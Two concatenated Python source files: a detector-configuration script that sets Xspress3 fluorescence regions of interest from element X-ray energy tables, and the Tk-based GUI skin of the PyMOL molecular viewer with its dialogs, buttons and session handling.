elem_K_list = np.array(['Na','Mg','Al','Si','P','S','Cl','Ar','K','Ca','Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn','Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y','Zr','Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn','Sb','Te','I','Xe','Cs','Ba','La','Hf','Ta','W','Re','Os','Ir','Pt','Au','Hg','Tl','Pb','Bi','Po','At','Rn','Fr','Ra','Ac','Ce','Pr','Nd','Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb','Lu','Th','Pa','U','Np','Pu','Am','Cm','Bk','Cf'])
energy_K_list = np.array([1040,1254,1487,1740,2011,2310,2622,2958,3314,3692,4093,4512,4953,5415,5900,6405,6931,7480,8046,8637,9251,9886,10543,11224,11924,12648,13396,14165,14958,15775,16615,17480,18367,19279,20216,21177,22163,23173,24210,25271,26359,27473,28612,29775,30973,32194,33442,55790,57535,59318,61141,63000,64896,66831,68806,70818,72872,74970,77107,79291,81516,83785,86106,88478,90884,34720,36027,37361,38725,40118,41542,42996,44482,45999,47547,49128,50742,52388,54070,93351,95868,98440,101059,103734,106472,109271,112121,115032])
elem_L_list = np.array(['Zn_L','Ga_L','Ge_L','AS_L','Se_L','Br_L','Kr_L','Rb_L','Sr_L','Y_L','Zr_L','Nb_L','Mo_L','Tc_L','Ru_L','Rh_L','Pd_L','Ag_L','Cd_L','In_L','Sn_L','Sb_L','Te_L','I_L','Xe_L','Cs_L','Ba_L','La_L','Hf_L','Ta_L','W_L','Re_L','Os_L','Ir_L','Pt_L','Au_L','Hg_L','Tl_L','Pb_L','Bi_L','Po_L','At_L','Rn_L','Fr_L','Ra_L','Ac_L','Ce_L','Pr_L','Nd_L','Pm_L','Sm_L','Eu_L','Gd_L','Tb_L','Dy_L','Ho_L','Er_L','Tm_L','Yb_L','Lu_L','Th_L','Pa_L','U_L','Np_L','Pu_L','Am_L','Cm_L','Bk_L','Cf_L'])
energy_L_list = np.array([1012,1098,1186,1282,1379,1481,1585,1692,1806,1924,2044,2169,2292,2423,2558,2697,2838,2983,3133,3280,3444,3604,3768,3938,4110,4285,4467,4647,7899,8146,8398,8652,8911,9175,9442,9713,9989,10269,10551,10839,11131,11427,11727,12031,12339,12652,4839,5035,5228,5432,5633,5850,6053,6273,6498,6720,6949,7180,7416,7655,12968,13291,13614,13946,14282,14620,14961,15308,15660])
elem_M_list = np.array(['Hf_M','Ta_M','W_M','Re_M','Os_M','Ir_M','Pt_M','Au_M','Hg_M','Tl_M','Pb_M','Bi_M','Po_M','At_M','Rn_M','Fr_M','Ra_M','Ac_M','Ce_M','Pr_M','Nd_M','Pm_M','Sm_M','Eu_M','Gd_M','Tb_M','Dy_M','Ho_M','Er_M','Tm_M','Yb_M','Lu_M','Th_M','Pa_M','U_M','Np_M','Pu_M','Am_M','Cm_M','Bk_M','Cf_M'])
energy_M_list = np.array([1646,1712,1775,1840,1907,1976,2048,2118,2191,2267,2342,2418,2499,2577,2654,2732,2806,2900,884,927,979,1023,1078,1122,1181,1233,1284,1342,1404,1463,1526,1580,2990,3071,3164,3250,3339,3429,3525,3616,3709])
def xspress3_roi_setup():
elem_list = np.array(['P','Si','S','Cl','Ca','K','Fe','Zn','Mn','Cu','Ni','Cr','Co','Pt_L','Pt_M','Er_L'])
num_elem = np.size(elem_list)
if num_elem > 16:
num_elem = 16
for channel in [xspress3.channel1, xspress3.channel2, xspress3.channel3]:
for i in range(num_elem):
if elem_list[i] in elem_K_list:
energy = energy_K_list[elem_K_list == elem_list[i]]
elif elem_list[i] in elem_L_list:
energy = energy_L_list[elem_L_list == elem_list[i]]
elif elem_list[i] in elem_M_list:
energy = energy_M_list[elem_M_list == elem_list[i]]
else:
print(elem_list[i], 'is not defined.')
break
channel.set_roi(i+1, energy-150, energy+150, name=elem_list[i])
'''
def xspress3_roi_setup():
for channel in [xspress3.channel1, xspress3.channel2, xspress3.channel3]:
#channel.set_roi(1, 9300, 9600, name='Pt')
channel.set_roi(1, 1590, 1890, name='Si')
#channel.set_roi(2, 1898, 2198, name='Pt_M')
#channel.set_roi(2, 2150, 2450, name='S')
#channel.set_roi(2, 14000, 14300, name='Sr')
#channel.set_roi(2, 3790, 4090, name='I')
#channel.set_roi(2, 3850, 4140, name='Bi_M')
#channel.set_roi(2, 3300, 3600, name='Sn')
channel.set_roi(4, 8250, 8550, name='W')
channel.set_roi(2, 4690, 4990, name='Ce')
#channel.set_roi(3, 4150, 4450, name='Cs')
#channel.set_roi(2, 2019, 2319, name='Nb')
#channel.set_roi(3, 5700, 6000, name='Eu')
channel.set_roi(3, 4360, 4660, name='Ti')
#channel.set_roi(3, 6800, 7100, name='Er')
#channel.set_roi(5, 4250, 4550, name='Ba')
channel.set_roi(5, 4150, 4450, name='Cs')
#channel.set_roi(3, 1970, 2270, name='Au_M')
#channel.set_roi(4, 5750, 6050, name='Mn')
#channel.set_roi(5, 2472, 2772, name='Cl')
#channel.set_roi(5, 2200, 2500, name='Pb_M')
#channel.set_roi(5, 2810, 3110, name='Ag')
#channel.set_roi(5, 6780, 7080, name='Co')
channel.set_roi(6, 3542, 3842, name='Ca')
channel.set_roi(7, 3130, 3430, name='In')
channel.set_roi(8, 5900, 6200, name='Gd')
channel.set_roi(9, 5078, 5378, name='Nd')
#channel.set_roi(9, 4800, 5100, name='V')
#channel.set_roi(7, 1850, 2150, name='P')
#channel.set_roi(8, 3000, 3300, name='Cd')
channel.set_roi(10, 5270, 5570, name='Cr')
#channel.set_roi(9, 3160, 3460, name='K')
#channel.set_roi(10, 10400, 10700, name='Pb')
#channel.set_roi(10, 3600, 3900, name='Te')
#channel.set_roi(11, 9550, 9850, name='Au')
channel.set_roi(11, 6250, 6550, name='Fe')
channel.set_roi(12, 11050, 11350, name='Se')
#channel.set_roi(13, 8487, 8787, name='Zn')
channel.set_roi(13, 8000, 8300, name='Ta')
channel.set_roi(14, 7330, 7630, name='Ni')
#channel.set_roi(15, 7950, 8150, name='Cu')
channel.set_roi(15, 9300, 9600, name='Pt')
#channel.set_roi(16, 11775, 12075, name='Br')
#channel.set_roi(16, 9736, 10036, name='Ge')
# channel.set_roi(17, 8250, 8550, 'W')
# channel.set_roi(18, 9600, 9750, 'Au')
# channel.set_roi(19, 11500, 12500, 'EL')
# channel.set_roi(20, 1900, 2000, 'Y')
# channel.set_roi(15, 1340, 1640, name='Al')
# channel.set_roi(22, 4360, 4660, 'Ti')
# channel.set_roi(23, 4550, 4750, 'La')
channel.set_roi(16, 9150, 9350, name='Ga')
'''
try:
print('Configuring Xspress3 ROIs...')
xspress3_roi_setup()
print('Done')
except KeyboardInterrupt:
print('Xspress3 ROI configuration cancelled.')
def hint_xspress_element(elm):
elm = elm.upper()
xspress3.hints['fields'] = [f'Det{j}_{elm}' for j in (1, 2, 3)]
def configure_xspress3(sclr):
sclr.configuration_attrs = sclr.component_names
sclr.flyer_timestamps.kind = 'omitted'
sclr.roi_data.kind = 'omitted'
sclr.make_directories.kind = 'omitted'
sclr.rewindable.kind = 'omitted'
for k, chan in sclr.channels.items():
chan.configuration_names.kind = 'config'
chan.vis_enabled.kind = 'omitted'
chan.rois.kind = 'normal'
chan.rois.num_rois.kind = 'config'
chan.name = chan.name.replace('annel', '')
for n in chan.rois.component_names:
if 'roi' in n and n != 'num_rois':
roi = getattr(chan.rois, n)
roi.kind = 'normal'
roi.value.kind = 'normal'
roi.value_sum.kind = 'omitted'
else:
attr = getattr(chan.rois, n)
attr.kind = 'config'
configure_xspress3(xspress3)
|
__init__.py
|
DEBUG = False
import sys
import re
import threading
import os
import time
if True:
from tkinter import *
import tkinter.filedialog as tkFileDialog
import tkinter.messagebox as tkMessageBox
import tkinter.font as tkFont
_next_method_name = '__next__'
import Pmw
from pymol.wizard import cleanup
from pmg_tk.Setting import Setting
from pmg_tk.SetEditor import SetEditor
from pmg_tk.ColorEditor import ColorEditor
from pmg_tk.skins import PMGSkin
from .builder import Builder
import pymol._gui
import traceback
root = None
def encode(s):
# obsolete since removal of py2
return s
def split_tk_file_list(pattern):
filenames = []
while True:
pattern = pattern.strip()
if not pattern:
break
sep = None
if pattern[0] == '{':
pattern = pattern[1:]
sep = '}'
a = pattern.split(sep, 1)
filenames.append(a[0])
pattern = a[1] if len(a) == 2 else ''
return filenames
def asksaveasfilename(*args, **kwargs):
filename = tkFileDialog.asksaveasfilename(*args, **kwargs)
return encode(filename)
def askopenfilename(*args, **kwargs):
filename = tkFileDialog.askopenfilename(*args, **kwargs)
if not filename:
return filename
multiple = kwargs.get('multiple', 0)
if not multiple:
filename = [filename]
elif not isinstance(filename, (list, tuple)):
filename = split_tk_file_list(filename)
filename = map(os.path.normpath, filename)
filename = map(encode, filename)
filename = list(filename)
if not multiple:
return filename[0]
return filename
def _darwin_browser_open(url):
os.popen("open "+url,'r').read()
def darwin_browser_open(url):
t = threading.Thread(target=_darwin_browser_open,args=(url,))
t.setDaemon(1)
t.start()
def _doAsync(self_cmd,cmmd,dirty=0):
self_cmd.do(cmmd) # force strict ordering of commands
if dirty:
self_cmd.dirty()
def _def_ext(ext): # platform-specific default extension handling
if sys.platform != 'win32':
ext = None # default extensions don't work right under X11/Tcl/Tk
return ext
class Normal(PMGSkin, pymol._gui.PyMOLDesktopGUI):
pad = ' ' # extra space in menus
appname = 'The PyMOL Molecular Graphics System'
appversion = '0.0.0.0' # will be set in __init__
copyright = ('Copyright (C) 2003-%d\n' % (time.localtime().tm_year,) +
'Schrodinger LLC.\n'+
'All rights reserved.')
contactweb = 'http://www.pymol.org'
contactemail = 'sales@schrodinger.com'
def scene_panel_menu_dialog(self):
print("scene_panel_menu_dialog not available in pmg_tk.")
# responsible for setup and takedown of the normal skin
def _inc_fontsize(self, delta, font):
size = font.cget('size')
sign = -1 if size < 0 else 1
size = max(5, abs(size) + delta)
font.configure(size=size * sign)
def inc_fontsize(self, delta=1):
for name in tkFont.names():
self._inc_fontsize(delta, tkFont.nametofont(name))
def inc_fontsize_dialog(self):
dialog = Toplevel(self.root)
grid = dialog
kw = {'row': 0, 'sticky': 'w', 'padx': 5, 'pady': 5}
col = getattr(iter(range(5)), _next_method_name)
Button(grid, text=' - ', command=lambda: self.inc_fontsize(-1)).grid(column=col(), **kw)
Button(grid, text=' + ', command=lambda: self.inc_fontsize( 1)).grid(column=col(), **kw)
Label(grid, text='All GUI Font Sizes').grid(column=col(), **kw)
kw['row'] = 1
col = getattr(iter(range(5)), _next_method_name)
Button(grid, text=' - ', command=lambda: self._inc_fontsize(-1, self.fixedfont)).grid(column=col(), **kw)
Button(grid, text=' + ', command=lambda: self._inc_fontsize( 1, self.fixedfont)).grid(column=col(), **kw)
Label(grid, text='Output Font Size').grid(column=col(), **kw)
dialog.title('GUI Font Size')
@property
def initialdir(self):
'''
Be in sync with cd/pwd on the console until the first file has been
browsed, then remember the last directory.
'''
return self._initialdir or os.getcwd()
@initialdir.setter
def initialdir(self, value):
self._initialdir = value
def cd_dialog(self):
self.cmd.cd(encode(tkFileDialog.askdirectory(
title="Change Working Directory",
initialdir=self.initialdir)) or '.', quiet=0)
def createDataArea(self):
# Create data area where data entry widgets are placed.
self.dataArea = self.app.createcomponent('dataarea',
(), None,
Frame, (self.app._hull,),
relief=SUNKEN,
bd=1)
self.dataArea.pack(side=LEFT, fill=BOTH, expand=YES,
padx=1, pady=1)
def destroyDataArea(self):
self.app.destroycomponent('dataarea')
def createCommandArea(self):
# Create a command area for application-wide buttons.
self.commandFrame = self.app.createcomponent('commandframe', (), None,
Frame,(self.app._hull,),relief=SUNKEN,bd=1)
self.commandFrame.place(width=500)
self.commandFrame.pack(side=TOP,
expand=NO,
fill=BOTH,
padx=1,
pady=1)
def destroyCommandArea(self):
self.app.destroycomponent('commandframe')
def createMessageBar(self):
self.messageBar = Pmw.MessageBar(self.commandFrame, entry_width = 25,
entry_relief='sunken', entry_borderwidth=1) #, labelpos = 'w')
self.abortButton=Button(self.commandFrame,
text='Abort',highlightthickness=0,
command=lambda s=self:self.abort(),padx=0,pady=0)
self.abortButton.pack(side=RIGHT,fill=BOTH,expand=YES)
self.abortButton=Button(self.commandFrame,
text='Rebuild',highlightthickness=0,
# state=DISABLED,
command=lambda s=self:self.rebuild(),padx=0,pady=0)
self.abortButton.pack(side=RIGHT,fill=BOTH,expand=YES)
self.messageBar.pack(side=BOTTOM, anchor=W, fill=X, expand=1)
self.balloon.configure(statuscommand = self.messageBar.helpmessage)
def destroyMessageBar(self):
self.messageBar.destroy()
def get_current_session_file(self):
session_file = self.cmd.get_setting_text("session_file")
session_file = session_file.replace("\\","/") # always use unix-like path separators
return session_file
def set_current_session_file(self, session_file):
session_file = session_file.replace("\\","/") # always use unix-like path separators
self.cmd.set("session_file",session_file)
def confirm_quit(self,e=None):
if self.cmd.get_setting_boolean("session_changed"):
session_file = self.get_current_session_file()
if session_file != '':
message = "Save the current session '%s'?"%os.path.split(session_file)[1]
else:
message = "Save the current session?"
check = tkMessageBox._show("Save Session", message,
tkMessageBox.QUESTION, tkMessageBox.YESNOCANCEL)
if check==tkMessageBox.YES:
if self.session_save():
self.quit_app()
elif check==tkMessageBox.NO:
self.quit_app()
else:
self.quit_app()
def quit_app(self):
self.cmd.log_close()
self.cmd.quit() # avoid logging this - it is inconvenient...
def buttonAdd(self,frame,text,cmmd):
newBtn=Button(frame,
text=text,highlightthickness=0,
command=cmmd,padx=0,pady=0)
newBtn.pack(side=LEFT,fill=BOTH,expand=YES)
return newBtn
def get_view(self):
self.cmd.get_view(2, quiet=0)
try:
str = self.cmd.get_view(3,quiet=1)
self.root.clipboard_clear()
self.root.clipboard_append(str)
self.last_view = str
self.app.selection_clear()
self.app.selection_own()
self.app.selection_handle(lambda a,b,s=self:s.last_view)
print(" PyMOL: Viewing matrix copied to clipboard.")
except:
traceback.print_exc()
def createButtons(self):
self.buttonArea = Frame(self.root)
self.buttonArea.pack(side=TOP, anchor=W)
row1 = self.app.createcomponent('row1', (), None,
Frame,self.commandFrame,bd=0)
row1.pack(side=TOP,fill=BOTH,expand=YES)
btn_reset = self.buttonAdd(row1,'Reset',lambda s=self: s.cmd.do("_ reset"))
btn_reset = self.buttonAdd(row1,'Zoom',lambda s=self: s.cmd.do("_ zoom animate=-1"))
btn_orient = self.buttonAdd(row1,'Orient',lambda s=self: s.cmd.do("_ orient animate=1"))
btn_rtrace = self.buttonAdd(row1,'Draw',lambda s=self: s.cmd.do("_ draw"))
btn_rtrace = self.buttonAdd(row1,'Ray',lambda s=self: s.cmd.do("_ ray async=1"))
row2 = self.app.createcomponent('row2', (), None,
Frame,self.commandFrame,bd=0)
row2.pack(side=TOP,fill=BOTH,expand=YES)
btn_unpick = self.buttonAdd(row2,'Unpick',lambda s=self: s.cmd.do("_ unpick"))
btn_hidesele = self.buttonAdd(row2,'Deselect', lambda: self.cmd.do("_ deselect"))
btn_reset = self.buttonAdd(row2,'Rock',lambda s=self: s.cmd.do("_ rock"))
btn_getview = self.buttonAdd(row2,'Get View',lambda s=self: s.get_view()) # doesn't get logged
row3 = self.app.createcomponent('row3', (), None,
Frame,self.commandFrame,bd=0)
row3.pack(side=TOP,fill=BOTH,expand=YES)
btn_rewind = self.buttonAdd(row3,'|<',lambda s=self: s.cmd.do("_ rewind"))
btn_back = self.buttonAdd(row3,'<',lambda s=self: s.cmd.do("_ backward"))
btn_stop = self.buttonAdd(row3,'Stop',lambda s=self: s.cmd.do("_ mstop"))
btn_play = self.buttonAdd(row3,'Play',lambda s=self: s.cmd.do("_ mplay"))
btn_forward = self.buttonAdd(row3,'>',lambda s=self: s.cmd.do("_ forward"))
btn_last = self.buttonAdd(row3,'>|',lambda s=self: s.cmd.do("_ ending"))
btn_ccache = self.buttonAdd(row3,'MClear',lambda s=self: s.cmd.do("_ mclear"))
row4 = self.app.createcomponent('row4', (), None,
Frame,self.commandFrame,bd=0)
row4.pack(side=TOP,fill=BOTH,expand=YES)
self.cmdB = self.buttonAdd(row4,'Command',
lambda s=self:
s.toggleFrame(s.cmdFrame))
self.buildB = self.buttonAdd(row4,'Builder',
lambda s=self:
s.toggleFrame(s.buildFrame))
self.volB = self.buttonAdd(row4, 'Volume',
self.newVolumeFrame)
# initialize disabled
# self.volB.config(state=DISABLED)
def newVolumeFrame(self):
volumes = self.cmd.get_names_of_type("object:volume", public=1)
if not volumes:
return
if len(volumes) == 1:
self.cmd.volume_panel(volumes[0])
return
def callback():
sels = listbox.getcurselection()
if sels:
self.cmd.volume_panel(sels[0])
window.destroy()
title = 'Select a volume object'
window = Toplevel(self.app.root)
window.title(title)
listbox = Pmw.ScrolledListBox(window,
labelpos='nw',
label_text=title,
items=volumes,
selectioncommand=callback)
listbox.pack(padx=5, pady=5)
x, y = window.winfo_pointerxy()
window.geometry('+%d+%d' % (x - 20, y - 20))
def destroyButtonArea(self):
self.app.destroycomponent('row1')
self.app.destroycomponent('row2')
self.app.destroycomponent('row3')
self.app.destroycomponent('row4')
self.buttonArea.destroy()
def my_show(self,win,center=1):
win.show()
def my_withdraw(self,win):
if sys.platform!='linux2':
win.withdraw()
else:
win.destroy()
def my_activate(self,win,center=1,focus=None):
if sys.platform!='linux2':
win.activate()
else: # autocenter, deiconify, and run mainloop
# this is a workaround for a bug in the
# interaction between Tcl/Tk and common Linux
# window managers (namely KDE/Gnome) which causes
# an annoying 1-2 second delay in opening windows!
if center:
tw = win.winfo_reqwidth()+100
th = win.winfo_reqheight()+100
vw = win.winfo_vrootwidth()
vh = win.winfo_vrootheight()
x = max(0,(vw-tw)/2)
y = max(0,(vh-tw)/2)
win.geometry(newGeometry="+%d+%d"%(x,y))
win.deiconify()
if focus!=None:
focus.focus_set()
win.mainloop()
def my_deactivate(self,win):
if sys.platform!='linux2':
win.deactivate()
else: # autocenter, deiconify, and run mainloop
win.destroy()
def doAsync(self,cmmd):
t = threading.Thread(target=_doAsync,args=(self.cmd,cmmd))
t.setDaemon(1)
t.start()
def command_get(self):
return self.command.get()
def command_set(self, v):
return self.command.set(v)
def command_set_cursor(self, i):
self.entry.icursor(i)
def dump(self,event):
print(dir(event))
print(event.keysym, event.keycode)
def createConsole(self):
self.command = StringVar()
self.lineCount = 0
self._setup_history()
self.cmdFrame = Frame(self.dataArea)
self.buildFrame = Builder(self.app, self.dataArea)
self.toggleFrame(self.cmdFrame,startup=1)
self.entryFrame = Frame(self.cmdFrame)
self.entryFrame.pack(side=BOTTOM,expand=NO,fill=X)
self.entry_label = Label(self.entryFrame, text="PyMOL>", padx=1, pady=1, justify=RIGHT)
self.entry_label.pack(side=LEFT,expand=NO,fill=X)
self.entry = Entry(self.entryFrame, justify=LEFT, width=70,
textvariable=self.command)
self.entry.pack(side=LEFT,expand=YES,fill=X)
self.output = Pmw.ScrolledText(self.cmdFrame)
self.output.pack(side=TOP, fill=BOTH, expand=YES)
self.entry.bind('<Return>', lambda e, s=self:
(s.doTypedCommand(s.command.get()), s.command.set('')))
self.entry.bind('<Tab>', lambda e, s=self: s.complete(e))
self.entry.bind('<Up>', lambda e, s=self: s.back())
self.entry.bind('<Down>', lambda e, s=self: s.forward())
self.entry.bind('<Control-Up>', lambda e: self.back_search())
self.root.protocol("WM_DELETE_WINDOW", lambda s=self: s.confirm_quit())
self.log_file = "log.pml"
# self.entry = self.app.createcomponent('entry', (), None,
# Entry,
# (self.dataArea,),
# justify=LEFT,
# width=50,
### textvariable=self.command)
text = self.output.component('text')
self.text = text
if sys.platform.startswith('win'):
self.font = 'lucida console' # only available on windows
self.my_fw_font=(self.font,8)
self.fixedfont.configure(family=self.font, size=self.my_fw_font[1])
else:
text.tk.call('tk','scaling',1)
self.font = 'fixed' # should be available on any X11-based platform
self.my_fw_font=(self.font,10)
if sys.platform == 'darwin':
self.fixedfont.configure(size=11)
text.configure(width=74)
self.balloon.bind(self.entry, '''Command Input Area
Get the list of commands by hitting <TAB>
Get the list of arguments for one command with a question mark:
PyMOL> color ?
Read the online help for a command with "help":
PyMOL> help color
Get autocompletion for many arguments by hitting <TAB>
PyMOL> color ye<TAB> (will autocomplete "yellow")
''')
if self.app.allow_after:
self.output.after(100,self.update_feedback)
self.output.after(100,self.update_menus)
self.output.pack(side=BOTTOM,expand=YES,fill=BOTH)
self.app.bind(self.entry, 'Command Input Area')
self.app.bind_all('<F1>',lambda e,s=self: s.cmd.do("cmd._special(1,0,0)"))
self.app.bind_all('<F2>',lambda e,s=self: s.cmd.do("cmd._special(2,0,0)"))
self.app.bind_all('<F3>',lambda e,s=self: s.cmd.do("cmd._special(3,0,0)"))
self.app.bind_all('<F4>',lambda e,s=self: s.cmd.do("cmd._special(4,0,0)"))
self.app.bind_all('<F5>',lambda e,s=self: s.cmd.do("cmd._special(5,0,0)"))
self.app.bind_all('<F6>',lambda e,s=self: s.cmd.do("cmd._special(6,0,0)"))
self.app.bind_all('<F7>',lambda e,s=self: s.cmd.do("cmd._special(7,0,0)"))
self.app.bind_all('<F8>',lambda e,s=self: s.cmd.do("cmd._special(8,0,0)"))
self.app.bind_all('<F9>',lambda e,s=self: s.cmd.do("cmd._special(9,0,0)"))
self.app.bind_all('<F10>',lambda e,s=self: s.cmd.do("cmd._special(10,0,0)"))
self.app.bind_all('<F11>',lambda e,s=self: s.cmd.do("cmd._special(11,0,0)"))
self.app.bind_all('<F12>',lambda e,s=self: s.cmd.do("cmd._special(12,0,0)"))
self.app.bind_all('<Control-F1>',lambda e,s=self: s.cmd.do("cmd._special(1,0,0,2)"))
self.app.bind_all('<Control-F2>',lambda e,s=self: s.cmd.do("cmd._special(2,0,0,2)"))
self.app.bind_all('<Control-F3>',lambda e,s=self: s.cmd.do("cmd._special(3,0,0,2)"))
self.app.bind_all('<Control-F4>',lambda e,s=self: s.cmd.do("cmd._special(4,0,0,2)"))
self.app.bind_all('<Control-F5>',lambda e,s=self: s.cmd.do("cmd._special(5,0,0,2)"))
self.app.bind_all('<Control-F6>',lambda e,s=self: s.cmd.do("cmd._special(6,0,0,2)"))
self.app.bind_all('<Control-F7>',lambda e,s=self: s.cmd.do("cmd._special(7,0,0,2)"))
self.app.bind_all('<Control-F8>',lambda e,s=self: s.cmd.do("cmd._special(8,0,0,2)"))
self.app.bind_all('<Control-F9>',lambda e,s=self: s.cmd.do("cmd._special(9,0,0,2)"))
self.app.bind_all('<Control-F10>',lambda e,s=self: s.cmd.do("cmd._special(10,0,0,2)"))
self.app.bind_all('<Control-F11>',lambda e,s=self: s.cmd.do("cmd._special(11,0,0,2)"))
self.app.bind_all('<Control-F12>',lambda e,s=self: s.cmd.do("cmd._special(12,0,0,2)"))
self.entry.bind('<Prior>',lambda e,s=self: s.cmd.do("cmd._special(104,0,0)"))
self.entry.bind('<Next>',lambda e,s=self: s.cmd.do("cmd._special(105,0,0)"))
self.entry.bind('<Control-Prior>',lambda e,s=self: s.cmd.do("cmd._special(104,0,0,2)"))
self.entry.bind('<Control-Next>',lambda e,s=self: s.cmd.do("cmd._special(105,0,0,2)"))
self.entry.bind('<Home>',lambda e,s=self: s.cmd.do("cmd._special(106,0,0)"))
self.entry.bind('<End>',lambda e,s=self: s.cmd.do("cmd._special(107,0,0)"))
def update_feedback(self):
feedback = self.cmd._get_feedback(self.cmd)
if feedback!=None:
self.text.configure(state='normal')
for a in feedback:
self.output.insert(END,"\n")
self.output.insert(END,a)
self.output.see(END)
self.lineCount = self.lineCount + 1
if self.lineCount > 10000:
self.output.delete('0.0','%i.%i' % (self.lineCount-5000,0))
self.lineCount=5000
self.text.configure(state='disabled')
progress = self.cmd.get_progress()
if progress>=0.0:
# self.abortButton.config(state=NORMAL)
self.messageBar.message("busy","Progress %d%%..."%int(progress*100))
else:
# self.abortButton.config(state=DISABLED)
self.messageBar.resetmessages("busy")
if self.app.allow_after:
if feedback == None: # PyMOL busy, so try more aggressively to get lock
self.output.after(10,self.update_feedback) # 100X a second
else:
self.output.after(100,self.update_feedback) # 10X a second
def abort(self):
self.cmd.interrupt()
# self.abortButton.config(state=DISABLED)
def rebuild(self):
self.doAsync("_ rebuild")
def toggleFrame(self, frame, startup=0):
if frame not in self.dataArea.slaves():
# clear all frames in dataArea
for f in self.dataArea.slaves():
f.pack_forget()
# add requested frame to data area
frame.pack(side=BOTTOM, fill=BOTH, expand=YES)
else:
# clear frame from data area
if frame != self.cmdFrame:
frame.pack_forget()
# next command will cause command frame to be turned on if
# nothing else is visible... might not want this behavior
self.cmdFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
frame = self.cmdFrame
if not startup:
if frame == self.cmdFrame:
if self.edit_mode != None:
self.cmd.edit_mode(self.edit_mode)
self.edit_mode = None
if self.auto_overlay != None:
self.cmd.set("auto_overlay",self.auto_overlay)
self.auto_overlay = None
if self.valence != None:
self.cmd.set("valence",self.valence)
elif frame == self.buildFrame:
frame.deferred_activate()
if "Editing" not in self.cmd.get("button_mode_name"):
self.cmd.edit_mode(1)
self.edit_mode = 0
self.valence = self.cmd.get("valence")
self.cmd.set("valence","1")
self.auto_overlay = self.cmd.get("auto_overlay")
self.cmd.set("auto_overlay",1)
def update_menus(self):
self.setting.refresh()
# 2019-06-25 Disabled because cmd.get_names_of_type() is a blocking
# command if the API is locked, blocks progress display.
if False:
# volume frame is closed, update the button
if len(self.cmd.get_names_of_type("object:volume",public=1))>0:
self.volB.config(state=NORMAL)
else:
self.volB.config(state=DISABLED)
# keep calling
if self.app.allow_after:
self.output.after(500,self.update_menus) # twice a second
def file_open(self,tutorial=0):
if not tutorial:
initdir = self.initialdir
ftypes = self.app.getLoadableFileTypes()
else:
initdir = os.environ['TUT']
# only list file extensions that are used for tutorial data
ftypes = [("Tutorial Data","*.pdb"),]
if TkVersion>8.3:
ofile_list = askopenfilename(initialdir = initdir,
filetypes=ftypes,
multiple=1) # new option in Tk 8.4
else:
ofile_list = [ askopenfilename(initialdir = initdir,
filetypes=ftypes) ]
for ofile in ofile_list:
if len(ofile):
if not tutorial:
self.initialdir = os.path.dirname(ofile)
try:
if ofile[-4:].lower() == '.pse' and ofile != self.save_file:
self.save_file = '' # remove ambiguous default
self.cmd.do('_ /cmd.load(%s, quiet=0)' % repr(ofile))
except self.pymol.CmdException:
print("Error: unable to open file '%s'"%ofile)
def log_open(self):
sfile = asksaveasfilename(initialfile = self.log_file,
initialdir = self.initialdir,
filetypes=[
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.log_file = os.path.basename(sfile)
self.cmd.log_open(sfile)
def log_resume(self,append_only=0):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Resumable","*.pml"),
("All Resumable","*.pym"),
("All Resumable","*.py"),
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.initialdir = os.path.dirname(ofile)
self.log_file = os.path.basename(ofile)
# os.chdir(self.initialdir)
self.cmd.resume(ofile)
def log_append(self,append_only=0):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Appendable","*.pml"),
("All Appendable","*.pym"),
("All Appendable","*.py"),
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.initialdir = os.path.dirname(ofile)
self.log_file = os.path.basename(ofile)
# os.chdir(self.initialdir)
self.cmd.log_open(ofile,'a')
def session_save(self):
self.save_file = self.get_current_session_file()
if self.save_file!='':
self.cmd.log("save %s,format=pse\n"%(self.save_file),
"cmd.save('%s',format='pse')\n"%(self.save_file))
# self.cmd.save(self.save_file,"","pse",quiet=0)
# self.cmd.set("session_changed",0)
self.cmd.do("_ cmd.save('''%s''','','pse',quiet=0)"%self.save_file) # do this in the main thread to block cmd.quit, etc.
self.cmd.do("_ cmd.set('session_changed',0)")
return 1
else:
return self.session_save_as()
def session_save_as(self):
(self.initialdir, self.save_file) = os.path.split(self.get_current_session_file())
(save_file, def_ext) = os.path.splitext(self.save_file)
sfile = asksaveasfilename(defaultextension = _def_ext(def_ext),
initialfile = save_file,
initialdir = self.initialdir,
filetypes=[
("PyMOL Session File","*.pse"),
("PyMOL Show File","*.psw"),
])
if len(sfile):
if re.search(r"\.pse$|\.PSE$|\.psw$|\.PSW$",sfile)==None:
sfile=sfile+".pse"
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s,format=pse\n"%(sfile),
"cmd.save('%s',format='pse')\n"%(sfile))
# self.cmd.save(sfile,"",format='pse',quiet=0)
# self.cmd.set("session_changed",0)
self.save_file = sfile
# self.cmd.set("session_file",self.save_file)
self.set_current_session_file(self.save_file)
# do this in the main thread to block cmd.quit, etc.
self.cmd.do("_ cmd.save('''%s''','','pse',quiet=0)"%self.save_file)
self.cmd.do("_ cmd.set('session_changed',0)")
return 1
else:
return 0
def file_save(self):
"""
File->Save Molecule, now with filtering
"""
def command(result):
if result == 'OK':
self.file_save2(
dialog.getcurselection(),
multiple_files_option.getvalue(),
states_option.getvalue())
self.my_withdraw(dialog)
def update_save_listbox():
lst = self.cmd.get_names('public')
searchstr = filter_entry.getvalue()
if searchstr:
lst = [x for x in lst if searchstr in x]
dialog.component("scrolledlist").setlist(lst)
dialog = Pmw.SelectionDialog(self.root,
title="Save",
buttons = ('OK', 'Cancel'),
defaultbutton='OK',
scrolledlist_labelpos=N,
scrolledlist_listbox_selectmode=EXTENDED,
label_text='Which object or selection would you like to save?',
scrolledlist_items = (), # used to be 'lst'
command = command)
filter_entry = Pmw.EntryField(dialog.interior(),
labelpos='w',
modifiedcommand=update_save_listbox,
validate=None,
value="",
label_text="Filter:")
